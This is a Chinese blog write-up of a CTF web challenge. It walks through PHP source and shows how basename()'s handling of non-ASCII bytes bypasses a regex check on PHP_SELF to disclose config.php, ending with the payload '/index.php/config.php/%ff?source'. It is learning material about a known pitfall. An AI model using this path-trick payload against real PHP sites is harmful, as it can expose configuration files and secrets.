本文探讨了一段PHP代码中的安全漏洞,该漏洞允许通过操纵`basename()`函数来绕过正则限制并读取`config.php`。作者通过本地测试展示了如何利用此问题,并提到了payload为`/index.php/config.php/%ff?source`。博客揭示了Web安全中的常见陷阱,提醒开发者注意代码审查和安全实践。
- 给了源码
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if (hash_equals($secret, $guess)) {
$message = 'Congratulations! The flag is: ' . FLAG;
} else {
$message = 'Wrong.';
}
}
?>
- 一堆不认识的东西 心塞… 一个个学
$_SERVER['PHP_SELF']:
PHP_SELF:当前执行脚本的文件名,与 document root 有关。例如,在地址为 http://example.com/foo/bar.php 的脚本中使用 $_SERVER[‘PHP_SELF’] 将得到 /foo/bar.php。_FILE_ 常量包含当前(例如包含)文件的完整路径和文件名。 如果 PHP 以命令行模式运行,这个变量将包含脚本名
- 本地尝试了一下
- 有趣的事情发生了
basename():
basename() 函数返回路径中的文件名部分。
- 自己运行试了一下
<?php
$path = "/testweb/home.php";
echo basename($path);
//显示带有文件扩展名的文件名
echo "<br>";
echo basename($path,".php");
//显示不带有文件扩展名的文件名
?>
<?php
$path = "/testweb/home.php/abc.php";
echo basename($path);
//显示带有文件扩展名的文件名
echo "<br>";
echo basename($path,".php");
//显示不带有文件扩展名的文件名
?>
- 这道题目的利用点就在于
basename()函数上
- 在自己的环境里尝试了一下
<?php
echo "\$_SERVER['PHP_SELF']:";
echo " ";
echo $_SERVER['PHP_SELF'];
echo "<br>";
echo "basename(\$_SERVER['PHP_SELF']):";
echo " ";
echo basename($_SERVER['PHP_SELF']);
?>
- basename()函数存在一个问题,它会去掉文件名开头的非ASCII值
- 所以在运行的时候 会出现上面的效果 既绕过了正则 又满足了读取config.php
- 所以payload为:
/index.php/config.php/%ff?source
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
